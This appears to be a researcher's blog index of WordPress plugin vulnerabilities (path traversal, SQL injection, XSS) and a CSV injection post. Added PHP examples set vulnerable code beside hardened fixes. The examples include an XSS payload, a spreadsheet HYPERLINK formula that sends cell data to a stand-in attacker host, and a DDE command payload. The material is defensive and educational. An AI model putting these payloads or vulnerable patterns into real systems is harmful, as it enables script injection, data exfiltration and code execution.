Kacper Szurek

Vulnerabilities

DukaPress 2.5.2 Path Traversal

$_REQUEST['src'] is passed directly to the file_get_contents function, so a crafted value can read files outside the intended directory.

13-11-2014

1 MIN READ

Vulnerabilities

Google Doc Embedder 2.5.14 SQL Injection

$_GET['gpid'] is not escaped.
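An added example of the pattern named in that entry, not the plugin's own code: $_GET['gpid'] interpolated into a query, next to the same lookup done through $wpdb->prepare(). The table and column names are assumptions chosen for the illustration.

```php
<?php
// Vulnerable pattern (illustrative, not the plugin's own code): the raw
// parameter is concatenated into SQL, so gpid=1 OR 1=1 rewrites the query.
function get_profile_vulnerable(wpdb $wpdb): ?object
{
    $gpid = $_GET['gpid'];
    return $wpdb->get_row("SELECT * FROM {$wpdb->prefix}example_profiles WHERE profile_id = $gpid");
}

// Hardened: coerce to the expected type and bind it through prepare(), which
// handles quoting; %d guarantees an integer regardless of what was sent.
function get_profile_hardened(wpdb $wpdb, mixed $gpid): ?object
{
    $gpid = absint($gpid);
    if ($gpid === 0) {
        return null; // profile ids start at 1; reject anything that did not parse
    }
    return $wpdb->get_row(
        $wpdb->prepare(
            "SELECT * FROM {$wpdb->prefix}example_profiles WHERE profile_id = %d",
            $gpid
        )
    );
}

// Usage inside WordPress (the global $wpdb is provided by core):
// $row = get_profile_hardened($wpdb, $_GET['gpid'] ?? 0);
```

For string parameters use %s in the same way; never build the placeholder list from user input, and never pass a value that has already been through esc_sql() into prepare(), since it would be escaped twice.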

11-11-2014

1 MIN READ

Vulnerabilities

Contact Form Maker 1.7.18 XSS

_form_makercfm() is accessible for every registered user.

09-11-2014

1 MIN READ

Vulnerabilities

Link Library 5.8.10.6 Reflected XSS

$_GET['searchll'] is not escaped.

08-11-2014

1 MIN READ

Vulnerabilities

WP Photo Album Plus 5.4.17 Reflected XSS

$_GET['walbum'] is not escaped.

06-11-2014

1 MIN READ

Vulnerabilities

WordPress Smart Forms 2.1.0 XSS

The _rednao_smart_forms_save_formvalues function is reachable by anyone, unauthenticated, through admin-ajax.php.

06-11-2014

2 MIN READ

Vulnerabilities

Ninja Forms 2.8.6 Reflected XSS

$_REQUEST['update_message'] is not escaped.
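The three reflected XSS entries above (Link Library's $_GET['searchll'], WP Photo Album Plus's $_GET['walbum'] and Ninja Forms' $_REQUEST['update_message']) share one root cause: a request parameter written into HTML without context-appropriate escaping. The added example below is not any of those plugins' code; it shows the pattern and its fix with the WordPress escaping helpers, and defines stand-ins for them so it also runs outside WordPress (an assumption about their behaviour, close enough for the demonstration).

```php
<?php
// Stand-ins so the file runs without WordPress; inside WordPress the real
// esc_attr()/esc_html() are used instead (assumed equivalent for this demo).
if (!function_exists('esc_attr')) {
    function esc_attr(string $s): string
    {
        return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
}
if (!function_exists('esc_html')) {
    function esc_html(string $s): string
    {
        return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
}

// Vulnerable pattern (illustrative): the search term is echoed back verbatim, so
// searchll="><script>alert(1)</script> breaks out of the attribute.
function render_search_vulnerable(string $search): string
{
    return '<input type="text" name="searchll" value="' . $search . '">';
}

// Hardened: escape for the context the value lands in. Attribute values take
// esc_attr(), text nodes take esc_html(); URLs would take esc_url().
function render_search_hardened(string $search): string
{
    return '<input type="text" name="searchll" value="' . esc_attr($search) . '">';
}

function render_notice_hardened(string $message): string
{
    return '<div class="updated"><p>' . esc_html($message) . '</p></div>';
}

// Constructed input, the kind of value the entries above describe.
$payload = '"><script>alert(1)</script>';
echo render_search_vulnerable($payload), PHP_EOL;  // markup broken, script runs
echo render_search_hardened($payload), PHP_EOL;    // value="&quot;&gt;&lt;script&gt;..."
echo render_notice_hardened($payload), PHP_EOL;
```

Escaping at output time, per context, is the fix; sanitising on input (sanitize_text_field() and friends) is worth doing too but does not replace it, because the same string may later be placed into an attribute, a script block or a URL.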

06-11-2014

1 MIN READ

Vulnerabilities

WP Contact Bank Standard Edition 2.0.69 XSS

Data from checkboxes is neither validated nor escaped before it is written to the database.

05-11-2014

1 MIN READ

From 0 to pentesting hero

CSV Injection

It can be found on any website that lets users export data to CSV. But how can a plain-text format be used for an attack?
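An added example of the defensive side of that topic, not code from the post it announces: a CSV export that neutralises cells a spreadsheet would otherwise evaluate as a formula. The trigger characters follow the OWASP CSV injection guidance; the sample rows are constructed for the demonstration.

```php
<?php
// Cells beginning with one of these characters are treated as formulas by
// Excel and LibreOffice (=, +, -, @) or can terminate a cell early (tab, CR).
const CSV_FORMULA_TRIGGERS = "=+-@\t\r";

function csv_safe_cell(string $cell): string
{
    // Plain numbers such as -5 or +3.2 are left alone; they are data, not formulas.
    if (is_numeric($cell)) {
        return $cell;
    }
    // Spreadsheets ignore leading spaces when deciding whether a cell is a formula.
    $trimmed = ltrim($cell, ' ');
    if ($trimmed !== '' && str_contains(CSV_FORMULA_TRIGGERS, $trimmed[0])) {
        // A leading single quote forces the cell to be read as text.
        return "'" . $cell;
    }
    return $cell;
}

function export_csv(array $rows, $stream): void
{
    foreach ($rows as $row) {
        // fputcsv() handles quoting of commas and quotes; it does nothing about
        // formulas, which is why csv_safe_cell() runs on every field first.
        fputcsv($stream, array_map('csv_safe_cell', array_map('strval', $row)));
    }
}

// Constructed sample export, not real user data.
$rows = [
    ['name', 'balance', 'comment'],
    ['alice', '-5', 'hello'],
    ['mallory', '10', '=HYPERLINK("http://attacker.example/?c="&A1,"click me")'],
    ['eve', '0', '+cmd|\' /C calc\'!A0'],
];
$out = fopen('php://output', 'w');
export_csv($rows, $out);
fclose($out);
```

The quote prefix is visible to the user who opens the file, which is the accepted trade-off; the alternative of dropping the trigger characters silently alters data. Keep the check on the export side, since the values were accepted as ordinary text when they were stored.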

27-03-2019

2 MIN READ

© 2025 Kacper Szurek